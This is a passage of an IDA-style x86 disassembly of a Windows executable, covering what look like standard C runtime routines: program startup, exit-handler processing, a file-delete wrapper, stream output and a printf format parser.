jnz short loc_417BD3
jmp short loc_417B55
; ---------------------------------------------------------------------------
loc_417BA6: ; CODE XREF: sub_417AD9+F�j
cmp ds:dword_4C911C, esi
jnz short loc_417BB9
push [ebp+arg_4]
call sub_415C80
pop ecx
jmp short loc_417BD3
; ---------------------------------------------------------------------------
loc_417BB9: ; CODE XREF: sub_417AD9+D3�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push ds:dword_4C912C
call ds:dword_422134 ; MultiByteToWideChar
cmp eax, esi
jz short loc_417B55
loc_417BD2: ; CODE XREF: sub_417AD9+6B�j
dec eax
loc_417BD3: ; CODE XREF: sub_417AD9+1A�j
; sub_417AD9+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_417AD9 endp
; =============== S U B R O U T I N E =======================================
sub_417BD8 proc near ; CODE XREF: _0:00417D97�p
mov eax, ds:off_42F32C
test eax, eax
jz short loc_417BE3
call eax ; sub_415F19
loc_417BE3: ; CODE XREF: sub_417BD8+7�j
push (offset loc_42401D+3)
push offset dword_42400C
call sub_417CC0
push offset dword_424008
push offset dword_424000
call sub_417CC0
add esp, 10h
retn
sub_417BD8 endp
; =============== S U B R O U T I N E =======================================
sub_417C05 proc near ; CODE XREF: _0:00417DD6�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_417C27
add esp, 0Ch
retn
sub_417C05 endp
; =============== S U B R O U T I N E =======================================
sub_417C16 proc near ; CODE XREF: _0:00417DF5�p
; sub_417DFA+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_417C27
add esp, 0Ch
retn
sub_417C16 endp
; =============== S U B R O U T I N E =======================================
sub_417C27 proc near ; CODE XREF: sub_417C05+8�p
; sub_417C16+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp ds:dword_4C90CC, edi
jnz short loc_417C44
push [esp+4+arg_0]
call ds:dword_42211C ; GetCurrentProcess
push eax
call ds:dword_422158 ; TerminateProcess
loc_417C44: ; CODE XREF: sub_417C27+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov ds:dword_4C90C8, edi
mov ds:byte_4C90C4, bl
jnz short loc_417C98
mov eax, ds:dword_4CA71C
test eax, eax
jz short loc_417C87
mov ecx, ds:dword_4CA718
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_417C86
loc_417C73: ; CODE XREF: sub_417C27+5D�j
mov eax, [esi]
test eax, eax
jz short loc_417C7B
call eax
loc_417C7B: ; CODE XREF: sub_417C27+50�j
sub esi, 4
cmp esi, ds:dword_4CA71C
jnb short loc_417C73
loc_417C86: ; CODE XREF: sub_417C27+4A�j
pop esi
loc_417C87: ; CODE XREF: sub_417C27+3C�j
push offset dword_42402C
push offset dword_424024
call sub_417CC0
pop ecx
pop ecx
loc_417C98: ; CODE XREF: sub_417C27+33�j
push offset dword_424038
push offset dword_424030
call sub_417CC0
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_417CBE
push [esp+4+arg_0]
mov ds:dword_4C90CC, edi
call ds:off_42212C
loc_417CBE: ; CODE XREF: sub_417C27+85�j
pop edi
retn
sub_417C27 endp
; =============== S U B R O U T I N E =======================================
sub_417CC0 proc near ; CODE XREF: sub_417BD8+15�p
; sub_417BD8+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_417CC5: ; CODE XREF: sub_417CC0+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_417CD8
mov eax, [esi]
test eax, eax
jz short loc_417CD3
call eax
loc_417CD3: ; CODE XREF: sub_417CC0+F�j
add esi, 4
jmp short loc_417CC5
; ---------------------------------------------------------------------------
loc_417CD8: ; CODE XREF: sub_417CC0+9�j
pop esi
retn
sub_417CC0 endp
; =============== S U B R O U T I N E =======================================
sub_417CDA proc near ; CODE XREF: sub_40D2E0+2BBB�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_42213C ; DeleteFileA
test eax, eax
jnz short loc_417CF0
call ds:dword_42206C ; RtlGetLastWin32Error
jmp short loc_417CF2
; ---------------------------------------------------------------------------
loc_417CF0: ; CODE XREF: sub_417CDA+C�j
xor eax, eax
loc_417CF2: ; CODE XREF: sub_417CDA+14�j
test eax, eax
jz short loc_417D01
push eax
call sub_41D064
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_417D01: ; CODE XREF: sub_417CDA+1A�j
xor eax, eax
retn
sub_417CDA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422698
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call ds:dword_422188 ; GetVersion
xor edx, edx
mov dl, ah
mov ds:dword_4C909C, edx
mov ecx, eax
and ecx, 0FFh
mov ds:dword_4C9098, ecx
shl ecx, 8
add ecx, edx
mov ds:dword_4C9094, ecx
shr eax, 10h
mov ds:dword_4C9090, eax
xor esi, esi
push esi
call sub_418E04
pop ecx
test eax, eax
jnz short loc_417D70
push 1Ch
call sub_417E1F
pop ecx
loc_417D70: ; CODE XREF: _0:00417D66�j
mov [ebp-4], esi
call sub_41D6DF
call ds:dword_422184 ; GetCommandLineA
mov ds:dword_4CA70C, eax
call sub_41D5AD
mov ds:dword_4C90D0, eax
call sub_41D360
call sub_41D2A7
call sub_417BD8
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call ds:dword_422180 ; GetStartupInfoA
call sub_41D24F
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_417DBD
movzx eax, word ptr [ebp-2Ch]
jmp short loc_417DC0
; ---------------------------------------------------------------------------
loc_417DBD: ; CODE XREF: _0:00417DB5�j
push 0Ah
pop eax
loc_417DC0: ; CODE XREF: _0:00417DBB�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call ds:off_4220E0
push eax
call sub_40CB17
mov [ebp-60h], eax
push eax
call sub_417C05
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_41D0CB
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_417C16
; =============== S U B R O U T I N E =======================================
sub_417DFA proc near ; CODE XREF: sub_416832+16�p
; sub_41D2A7+4E�p ...
arg_0 = dword ptr 4
cmp ds:dword_4C90D8, 1
jnz short loc_417E08
call sub_41D96C
loc_417E08: ; CODE XREF: sub_417DFA+7�j
push [esp+arg_0]
call sub_41D9A5
push 0FFh
call ds:off_42F350
pop ecx
pop ecx
retn
sub_417DFA endp
; =============== S U B R O U T I N E =======================================
sub_417E1F proc near ; CODE XREF: _0:00417D6A�p
arg_0 = dword ptr 4
cmp ds:dword_4C90D8, 1
jnz short loc_417E2D
call sub_41D96C
loc_417E2D: ; CODE XREF: sub_417E1F+7�j
push [esp+arg_0]
call sub_41D9A5
pop ecx
push 0FFh
call ds:off_42212C
retn
sub_417E1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E43 proc near ; CODE XREF: sub_415480+46�p
; sub_4159FA+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_417F4C
test al, 40h
jnz loc_417F4C
test al, 1
jz short loc_417E7B
and dword ptr [esi+4], 0
test al, 10h
jz loc_417F4C
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_417E7B: ; CODE XREF: sub_417E43+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_417EB5
cmp esi, offset dword_431A98
jz short loc_417EA3
cmp esi, offset dword_431AB8
jnz short loc_417EAE
loc_417EA3: ; CODE XREF: sub_417E43+56�j
push ebx
call sub_41DB3C
test eax, eax
pop ecx
jnz short loc_417EB5
loc_417EAE: ; CODE XREF: sub_417E43+5E�j
push esi
call sub_41DAF8
pop ecx
loc_417EB5: ; CODE XREF: sub_417E43+4E�j
; sub_417E43+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_417F22
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_417EE5
push edi
push eax
push ebx
call sub_41CEB7
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_417F18
; ---------------------------------------------------------------------------
loc_417EE5: ; CODE XREF: sub_417E43+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_417F00
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4CA3C0[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_417F05
; ---------------------------------------------------------------------------
loc_417F00: ; CODE XREF: sub_417E43+A5�j
mov eax, offset dword_4319E0
loc_417F05: ; CODE XREF: sub_417E43+BB�j
test byte ptr [eax+4], 20h
jz short loc_417F18
push 2
push 0
push ebx
call sub_41C637
add esp, 0Ch
loc_417F18: ; CODE XREF: sub_417E43+A0�j
; sub_417E43+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_417F36
; ---------------------------------------------------------------------------
loc_417F22: ; CODE XREF: sub_417E43+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_41CEB7
add esp, 0Ch
mov [ebp+arg_4], eax
loc_417F36: ; CODE XREF: sub_417E43+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_417F42
or dword ptr [esi+0Ch], 20h
jmp short loc_417F51
; ---------------------------------------------------------------------------
loc_417F42: ; CODE XREF: sub_417E43+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_417F54
; ---------------------------------------------------------------------------
loc_417F4C: ; CODE XREF: sub_417E43+10�j
; sub_417E43+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_417F51: ; CODE XREF: sub_417E43+FD�j
or eax, 0FFFFFFFFh
loc_417F54: ; CODE XREF: sub_417E43+107�j
pop esi
pop ebx
pop ebp
retn
sub_417E43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417F58 proc near ; CODE XREF: sub_415480+29�p
; sub_4159FA+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_418671
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_417F8C
; ---------------------------------------------------------------------------
loc_417F84: ; CODE XREF: sub_417F58+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_417F8C: ; CODE XREF: sub_417F58+2A�j
cmp [ebp+var_14], edx
jl loc_418671
cmp bl, 20h
jl short loc_417FAD
cmp bl, 78h
jg short loc_417FAD
movsx eax, bl
mov al, [eax+422684h]
and eax, 0Fh
jmp short loc_417FAF
; ---------------------------------------------------------------------------
loc_417FAD: ; CODE XREF: sub_417F58+40�j
; sub_417F58+45�j
xor eax, eax
loc_417FAF: ; CODE XREF: sub_417F58+53�j
movsx eax, ds:byte_4226A4[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_418660 ; default
jmp off_418679[eax*4] ; switch jump
loc_417FCD: ; DATA XREF: _0:off_418679�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 00417FC6 case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_417FE8: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
movsx eax, bl ; jumptable 00417FC6 case 2
sub eax, 20h
jz short loc_41802B
sub eax, 3
jz short loc_418022
sub eax, 8
jz short loc_418019
dec eax
dec eax
jz short loc_418010
sub eax, 3
jnz loc_418660 ; default
or [ebp+var_4], 8
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_418010: ; CODE XREF: sub_417F58+A4�j
or [ebp+var_4], 4
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_418019: ; CODE XREF: sub_417F58+A0�j
or [ebp+var_4], 1
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_418022: ; CODE XREF: sub_417F58+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_41802B: ; CODE XREF: sub_417F58+96�j
or [ebp+var_4], 2
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_418034: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
cmp bl, 2Ah ; jumptable 00417FC6 case 3
jnz short loc_41805C
lea eax, [ebp+arg_8]
push eax
call sub_418737
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_418660 ; default
or [ebp+var_4], 4
neg eax
loc_418054: ; CODE XREF: sub_417F58+111�j
mov [ebp+var_20], eax
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_41805C: ; CODE XREF: sub_417F58+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_418054
; ---------------------------------------------------------------------------
loc_41806B: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
mov [ebp+var_10], edx ; jumptable 00417FC6 case 4
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_418073: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
cmp bl, 2Ah ; jumptable 00417FC6 case 5
jnz short loc_418096
lea eax, [ebp+arg_8]
push eax
call sub_418737
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_418660 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_418096: ; CODE XREF: sub_417F58+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_4180A8: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
cmp bl, 49h ; jumptable 00417FC6 case 6
jz short loc_4180DB
cmp bl, 68h
jz short loc_4180D2
cmp bl, 6Ch
jz short loc_4180C9
cmp bl, 77h
jnz loc_418660 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_4180C9: ; CODE XREF: sub_417F58+15D�j
or [ebp+var_4], 10h
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_4180D2: ; CODE XREF: sub_417F58+158�j
or [ebp+var_4], 20h
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_4180DB: ; CODE XREF: sub_417F58+153�j
cmp byte ptr [edi], 36h
jnz short loc_4180F4
cmp byte ptr [edi+1], 34h
jnz short loc_4180F4
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_4180F4: ; CODE XREF: sub_417F58+186�j
; sub_417F58+18C�j
mov [ebp+var_30], edx
loc_4180F7: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
mov ecx, ds:off_42F360 ; jumptable 00417FC6 case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_418123
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_418699
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_418123: ; CODE XREF: sub_417F58+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_418699
add esp, 0Ch
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_41813B: ; CODE XREF: sub_417F58+6E�j
; DATA XREF: _0:off_418679�o
movsx eax, bl ; jumptable 00417FC6 case 7
cmp eax, 67h
jg loc_418363
cmp eax, 65h
jge loc_4181E6
cmp eax, 58h
jg loc_418244
jz loc_4183D7
sub eax, 43h
jz loc_418207
dec eax
dec eax
jz short loc_4181DC
dec eax
dec eax
jz short loc_4181DC
sub eax, 0Ch
jnz loc_418562
test word ptr [ebp+var_4], 830h
jnz short loc_418185
or byte ptr [ebp+var_4+1], 8
loc_418185: ; CODE XREF: sub_417F58+227�j
; sub_417F58+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_418192
mov esi, 7FFFFFFFh
loc_418192: ; CODE XREF: sub_417F58+233�j
lea eax, [ebp+arg_8]
push eax
call sub_418737
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_4183AB
test ecx, ecx
jnz short loc_4181BA
mov ecx, ds:off_42F35C
mov [ebp+var_8], ecx
loc_4181BA: ; CODE XREF: sub_417F58+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_4181C3: ; CODE XREF: sub_417F58+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_4183A2
cmp word ptr [eax], 0
jz loc_4183A2
inc eax
inc eax
jmp short loc_4181C3
; ---------------------------------------------------------------------------
loc_4181DC: ; CODE XREF: sub_417F58+212�j
; sub_417F58+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_4181E6: ; CODE XREF: sub_417F58+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_4182CA
mov [ebp+var_10], 6
jmp loc_4182D8
; ---------------------------------------------------------------------------
loc_418207: ; CODE XREF: sub_417F58+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_418213
or byte ptr [ebp+var_4+1], 8
loc_418213: ; CODE XREF: sub_417F58+2B5�j
; sub_417F58+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_41825A
call sub_418754
push eax
lea eax, [ebp+var_248]
push eax
call sub_41DC1B
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_41826D
mov [ebp+var_28], 1
jmp short loc_41826D
; ---------------------------------------------------------------------------
loc_418244: ; CODE XREF: sub_417F58+1FB�j
sub eax, 5Ah
jz short loc_41827B
sub eax, 9
jz short loc_418213
dec eax
jz loc_41843D
jmp loc_418562
; ---------------------------------------------------------------------------
loc_41825A: ; CODE XREF: sub_417F58+2C5�j
call sub_418737
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_41826D: ; CODE XREF: sub_417F58+2E1�j
; sub_417F58+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_418562
; ---------------------------------------------------------------------------
loc_41827B: ; CODE XREF: sub_417F58+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_418737
test eax, eax
pop ecx
jz short loc_4182BC
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4182BC
test byte ptr [ebp+var_4+1], 8
jz short loc_4182AD
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_418562
; ---------------------------------------------------------------------------
loc_4182AD: ; CODE XREF: sub_417F58+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_41855F
; ---------------------------------------------------------------------------
loc_4182BC: ; CODE XREF: sub_417F58+32F�j
; sub_417F58+336�j
mov eax, ds:off_42F358
mov [ebp+var_8], eax
push eax
jmp loc_418358
; ---------------------------------------------------------------------------
loc_4182CA: ; CODE XREF: sub_417F58+29D�j
jnz short loc_4182D8
cmp bl, 67h
jnz short loc_4182D8
mov [ebp+var_10], 1
loc_4182D8: ; CODE XREF: sub_417F58+2AA�j
; sub_417F58:loc_4182CA�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call ds:off_4316C0
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_41832A
cmp [ebp+var_10], 0
jnz short loc_41832A
lea eax, [ebp+var_248]
push eax
call ds:off_4316CC
pop ecx
loc_41832A: ; CODE XREF: sub_417F58+3BC�j
; sub_417F58+3C2�j
cmp bl, 67h
jnz short loc_418341
test esi, esi
jnz short loc_418341
lea eax, [ebp+var_248]
push eax
call ds:off_4316C4
pop ecx
loc_418341: ; CODE XREF: sub_417F58+3D5�j
; sub_417F58+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_418357
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_418357: ; CODE XREF: sub_417F58+3F0�j
push edi
loc_418358: ; CODE XREF: sub_417F58+36D�j
call sub_415C80
pop ecx
jmp loc_41855F
; ---------------------------------------------------------------------------
loc_418363: ; CODE XREF: sub_417F58+1E9�j
sub eax, 69h
jz loc_41843D
sub eax, 5
jz loc_418413
dec eax
jz loc_418400
dec eax
jz short loc_4183D0
sub eax, 3
jz loc_418185
dec eax
dec eax
jz loc_418441
sub eax, 3
jnz loc_418562
mov [ebp+var_2C], 27h
jmp short loc_4183DE
; ---------------------------------------------------------------------------
loc_4183A2: ; CODE XREF: sub_417F58+270�j
; sub_417F58+27A�j
sub eax, ecx
sar eax, 1
jmp loc_41855F
; ---------------------------------------------------------------------------
loc_4183AB: ; CODE XREF: sub_417F58+24F�j
test ecx, ecx
jnz short loc_4183B8
mov ecx, ds:off_42F358
mov [ebp+var_8], ecx
loc_4183B8: ; CODE XREF: sub_417F58+455�j
mov eax, ecx
loc_4183BA: ; CODE XREF: sub_417F58+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_4183C9
cmp byte ptr [eax], 0
jz short loc_4183C9
inc eax
jmp short loc_4183BA
; ---------------------------------------------------------------------------
loc_4183C9: ; CODE XREF: sub_417F58+467�j
; sub_417F58+46C�j
sub eax, ecx
jmp loc_41855F
; ---------------------------------------------------------------------------
loc_4183D0: ; CODE XREF: sub_417F58+425�j
mov [ebp+var_10], 8
loc_4183D7: ; CODE XREF: sub_417F58+201�j
mov [ebp+var_2C], 7
loc_4183DE: ; CODE XREF: sub_417F58+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_418448
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_418448
; ---------------------------------------------------------------------------
loc_418400: ; CODE XREF: sub_417F58+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_418448
or byte ptr [ebp+var_4+1], 2
jmp short loc_418448
; ---------------------------------------------------------------------------
loc_418413: ; CODE XREF: sub_417F58+417�j
lea eax, [ebp+arg_8]
push eax
call sub_418737
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_41842C
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_418431
; ---------------------------------------------------------------------------
loc_41842C: ; CODE XREF: sub_417F58+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_418431: ; CODE XREF: sub_417F58+4D2�j
mov [ebp+var_28], 1
jmp loc_418660 ; default
; ---------------------------------------------------------------------------
loc_41843D: ; CODE XREF: sub_417F58+2F7�j
; sub_417F58+40E�j
or [ebp+var_4], 40h
loc_418441: ; CODE XREF: sub_417F58+432�j
mov [ebp+var_C], 0Ah
loc_418448: ; CODE XREF: sub_417F58+491�j
; sub_417F58+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_41845A
lea eax, [ebp+arg_8]
push eax
call sub_418744
pop ecx
jmp short loc_41849B
; ---------------------------------------------------------------------------
loc_41845A: ; CODE XREF: sub_417F58+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_418481
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_418476
call sub_418737
pop ecx
movsx eax, ax
loc_418473: ; CODE XREF: sub_417F58+527�j
; sub_417F58+539�j
cdq
jmp short loc_41849B
; ---------------------------------------------------------------------------
loc_418476: ; CODE XREF: sub_417F58+510�j
call sub_418737
pop ecx
movzx eax, ax
jmp short loc_418473
; ---------------------------------------------------------------------------
loc_418481: ; CODE XREF: sub_417F58+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_418493
call sub_418737
pop ecx
jmp short loc_418473
; ---------------------------------------------------------------------------
loc_418493: ; CODE XREF: sub_417F58+531�j
call sub_418737
pop ecx
xor edx, edx
loc_41849B: ; CODE XREF: sub_417F58+500�j
; sub_417F58+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_4184BC
test edx, edx
jg short loc_4184BC
jl short loc_4184AB
test eax, eax
jnb short loc_4184BC
loc_4184AB: ; CODE XREF: sub_417F58+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_4184C0
; ---------------------------------------------------------------------------
loc_4184BC: ; CODE XREF: sub_417F58+547�j
; sub_417F58+54B�j ...
mov esi, eax
mov edi, edx
loc_4184C0: ; CODE XREF: sub_417F58+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_4184C9
and edi, 0
loc_4184C9: ; CODE XREF: sub_417F58+56C�j
cmp [ebp+var_10], 0
jge short loc_4184D8
mov [ebp+var_10], 1
jmp short loc_4184DC
; ---------------------------------------------------------------------------
loc_4184D8: ; CODE XREF: sub_417F58+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_4184DC: ; CODE XREF: sub_417F58+57E�j
mov eax, esi
or eax, edi
jnz short loc_4184E6
and [ebp+var_1C], 0
loc_4184E6: ; CODE XREF: sub_417F58+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_4184EC: ; CODE XREF: sub_417F58+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_4184FC
mov eax, esi
or eax, edi
jz short loc_418537
loc_4184FC: ; CODE XREF: sub_417F58+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_4172F0
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_417370
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_41852D
add ebx, [ebp+var_2C]
loc_41852D: ; CODE XREF: sub_417F58+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_4184EC
; ---------------------------------------------------------------------------
loc_418537: ; CODE XREF: sub_417F58+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_418562
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_418555
test eax, eax
jnz short loc_418562
loc_418555: ; CODE XREF: sub_417F58+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_41855F: ; CODE XREF: sub_417F58+35F�j
; sub_417F58+406�j ...
mov [ebp+var_C], eax
loc_418562: ; CODE XREF: sub_417F58+21B�j
; sub_417F58+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_418660 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_41859A
test bh, 1
jz short loc_41857F
mov [ebp+var_16], 2Dh
jmp short loc_418593
; ---------------------------------------------------------------------------
loc_41857F: ; CODE XREF: sub_417F58+61F�j
test bl, 1
jz short loc_41858A
mov [ebp+var_16], 2Bh
jmp short loc_418593
; ---------------------------------------------------------------------------
loc_41858A: ; CODE XREF: sub_417F58+62A�j
test bl, 2
jz short loc_41859A
mov [ebp+var_16], 20h
loc_418593: ; CODE XREF: sub_417F58+625�j
; sub_417F58+630�j
mov [ebp+var_1C], 1
loc_41859A: ; CODE XREF: sub_417F58+61A�j
; sub_417F58+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
